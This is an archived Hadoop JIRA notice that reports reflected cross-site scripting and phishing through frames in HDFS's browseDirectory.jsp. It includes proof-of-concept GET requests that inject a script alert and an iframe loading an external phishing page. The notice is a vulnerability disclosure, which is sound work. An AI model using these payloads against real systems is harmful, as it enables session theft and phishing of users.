hadoop-hdfs-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Jeffrey E Rodriguez (JIRA)" <j...@apache.org>
Subject [jira] [Created] (HDFS-4901) Site Scripting and Phishing Through Frames in browseDirectory.jsp
Date Thu, 13 Jun 2013 01:45:20 GMT
Jeffrey E  Rodriguez created HDFS-4901:
------------------------------------------

             Summary: Site Scripting and Phishing Through Frames in browseDirectory.jsp
                 Key: HDFS-4901
                 URL: https://issues.apache.org/jira/browse/HDFS-4901
             Project: Hadoop HDFS
          Issue Type: Bug
          Components: security, webhdfs
    Affects Versions: 2.0.3-alpha, 1.1.1
            Reporter: Jeffrey E  Rodriguez



It is possible to steal or manipulate customer session and cookies, which might be used to
impersonate a legitimate user,
allowing the hacker to view or alter user records, and to perform transactions as that user.
e.g.
GET /browseDirectory.jsp? dir=%2Fhadoop'"/><script>alert(759)</script> &namenodeInfoPort=50070

Also;

Phishing Through Frames

Try:
GET /browseDirectory.jsp? dir=%2Fhadoop%27%22%3E%3Ciframe+src%3Dhttp%3A%2F%2Fdemo.testfire.net%2Fphishing.html%3E
&namenodeInfoPort=50070 HTTP/1.1
Cookie: JSESSIONID=qd9i8tuccuam1cme71swr9nfi
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;




--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators
For more information on JIRA, see: http://www.atlassian.com/software/jira

Mime
View raw message